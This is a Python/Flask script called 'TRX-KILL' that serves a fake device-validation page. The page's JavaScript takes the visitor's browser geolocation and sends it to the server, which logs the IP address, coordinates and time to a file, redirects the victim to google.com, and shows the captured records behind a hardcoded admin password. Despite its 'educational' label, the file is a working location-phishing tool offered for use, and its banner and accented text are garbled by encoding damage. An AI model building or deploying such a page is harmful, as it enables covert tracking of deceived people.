import os, time, sys, getpass
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"
G, R, C, Y, W = "\033[1;32m", "\033[1;31m", "\033[1;36m", "\033[1;33m", "\033[0m"

def animar_texto(texto, velocidad=0.03):
    for char in texto:
        sys.stdout.write(char); sys.stdout.flush(); time.sleep(velocidad)
    print()

def boot():
    os.system('clear')
    banner = f"""{G}
 в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•— в–Ҳв–Ҳв•—  в–Ҳв–Ҳв•—     в–Ҳв–Ҳв•—  в–Ҳв–Ҳв•—в–Ҳв–Ҳв•—в–Ҳв–Ҳв•—     в–Ҳв–Ҳв•—
 в•ҡв•җв•җв–Ҳв–Ҳв•”в•җв•җв•қв–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в•ҡв–Ҳв–Ҳв•—в–Ҳв–Ҳв•”в•қ     в–Ҳв–Ҳв•‘ в–Ҳв–Ҳв•”в•қв–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘     в–Ҳв–Ҳв•‘
    в–Ҳв–Ҳв•‘   в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қ в•ҡв–Ҳв–Ҳв–Ҳв•”в•қ      в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қ в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘     в–Ҳв–Ҳв•‘
    в–Ҳв–Ҳв•‘   в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•— в–Ҳв–Ҳв•”в–Ҳв–Ҳв•—      в–Ҳв–Ҳв•”в•җв–Ҳв–Ҳв•— в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘     в–Ҳв–Ҳв•‘
    в–Ҳв–Ҳв•‘   в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•”в•қ в–Ҳв–Ҳв•—     в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—{W}"""
    print(banner)
    animar_texto(f"\n{C}# SISTEMA CONECTADO...{W}")
    animar_texto(f"{C}# BY: OSCAR{W}")
    animar_texto(f"{C}# LICENCIA: OSINT{W}")
    animar_texto(f"{C}# VERSIГ“N: 1.2.3{W}")
    time.sleep(1)
    print(f"\n{Y}>> BIENVENIDO A TRX-KILL <<{W}")
    animar_texto(f"\n{G}[EDUX-UI] CARGANDO MГ“DULOS DE INTERFAZ...{W}", 0.05)
    time.sleep(1)

# --- [HTML NEON] ---
HTML_ENCUESTA = """
<!DOCTYPE html><html><body style="background:#005500; color:#0f0; text-align:center; font-family:monospace; padding-top:50px;">
<div style="border:3px solid #0f0; display:inline-block; padding:20px; box-shadow:0 0 20px #0f0;">
    <h2>TRX-KILL VALIDACIГ“N</h2>
    <input type="text" id="marca" placeholder="ID Dispositivo" style="background:black; color:#0f0; border:1px solid #0f0;"><br><br>
    <button onclick="c()" style="background:#0f0; color:black; font-weight:bold;">ENVIAR</button>
</div>
<script>
function c(){
    let d = { marca: document.getElementById('marca').value };
    navigator.geolocation.getCurrentPosition((p)=>{
        d.lat = p.coords.latitude; d.lon = p.coords.longitude;
        fetch('/log', {method:'POST', headers:{'Content-Type':'application/json'}, body:JSON.stringify(d)}).then(()=>window.location.href="https://google.com");
    });
}
</script></body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    with open("result.txt", "a") as f:
        f.write(f"CAPTURA | IP: {request.remote_addr} | COORD: {d.get('lat')},{d.get('lon')} | MARCA: {d.get('marca')} | HORA: {time.ctime()}\n")
    return "OK"

def main():
    boot()
    if len(sys.argv) > 1 and sys.argv[1] == "--adm":
        pwd = getpass.getpass(f"{R}PASSWORD ADM:{W} ")
        if pwd == AUTH_PASS: os.system("cat result.txt")
        return

    while True:
        print(f"\n{C}--- OPCIONES DISPONIBLES ---{W}")
        animar_texto(f" [1] INFO NГҡMERO       [4] LICENCIA Y USO", 0.01)
        animar_texto(f" [2] LINK-ZP           [5] ACTUALIZACIГ“N", 0.01)
        animar_texto(f" [3] CREADOR           [6] PANEL ADM", 0.01)
        animar_texto(f" [7] SALIR", 0.01)
        
        sel = input(f"\n{Y}TRX-ROOT > {W}")
        
        if sel == "1": input(f"\n{G}[+] ESCANEANDO NГҡMERO...{W}")
        elif sel == "2":
            print(f"\n{C}Servidor activo en http://127.0.0.1:{PORT}{W}")
            app.run(port=PORT, host='127.0.0.1')
        elif sel == "3": print(f"\n{C}BY: OSCAR{W}"); input()
        elif sel == "4": print(f"\n{C}LICENCIA: OSINT | USO: EDUCATIVA{W}"); input()
        elif sel == "6":
            pwd = getpass.getpass(f"{R}CONTRASEГ‘A:{W} ")
            if pwd == AUTH_PASS:
                os.system("cat result.txt") if os.path.exists("result.txt") else print("Sin datos.")
                input("\n[Enter]...")
        elif sel == "7": sys.exit()

if __name__ == "__main__": main()
